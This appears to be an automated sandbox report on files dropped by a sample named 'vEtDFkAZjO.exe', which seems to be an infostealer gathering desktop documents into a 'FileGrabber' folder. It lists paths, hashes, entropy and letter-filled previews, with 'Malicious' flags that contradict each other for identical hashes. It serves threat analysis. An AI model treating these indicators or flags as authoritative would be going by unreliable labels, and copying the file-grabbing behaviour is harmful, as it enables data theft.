Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	true
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	true
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	true
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLC